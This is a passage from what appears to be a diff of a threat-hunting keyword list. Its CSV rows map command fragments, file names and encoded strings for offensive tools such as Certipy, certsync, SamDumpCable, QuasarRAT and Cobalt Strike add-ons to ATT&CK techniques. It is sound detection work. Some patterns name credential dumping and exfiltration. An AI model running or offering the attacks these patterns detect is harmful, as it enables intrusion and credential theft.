fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*certipy account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy auth *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca -backup*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy cert *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 
T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy find *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*certipy find *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy relay *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation 
tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy relay *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*certipy relay -ca *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certipy req *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy req *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*certipy req -username *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 
- TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certipy shadow *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy template *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*certipy-master.zip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy shadow *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy template *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation 
tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certipy-master.zip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*CertStealer.csproj*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.exe*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.sln*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" -"*certsync *--dc-ip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - 
TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*certsync -u *","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync *--dc-ip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync -u *","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*certsync -u * -p *-d * -ca-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certsync_ntds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
-"*certsync-master.zip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync_ntds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certsync-master.zip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*cewl --depth * --with-numbers -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*cfprefsd_race_condition*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*cfprefsd_race_condition*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*cGlpLmZkYS5nb3Y=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*cGlwZW5hbWU9*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" 
"*ChaitanyaHaritash/kimi*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*chameleon.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*changepasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*chameleon.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*changepasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*change-windows10-mac-address.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" "*charlesnathansmith/whatlicense*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*charles-proxy*","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*charlotte-main.zip*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*charlotte-main.zip*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*ChatLadon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*ChatLadon.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*check_all*.c*","offensive_tool_keyword","CheckPlease","c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" 
@@ -8387,11 +8535,11 @@
 "*check_all*.pl*","offensive_tool_keyword","CheckPlease","perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
 "*check_all*.ps1*","offensive_tool_keyword","CheckPlease","ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
 "*check_all*.py*","offensive_tool_keyword","CheckPlease","python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
-"*check_and_write_IAT_Hook*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 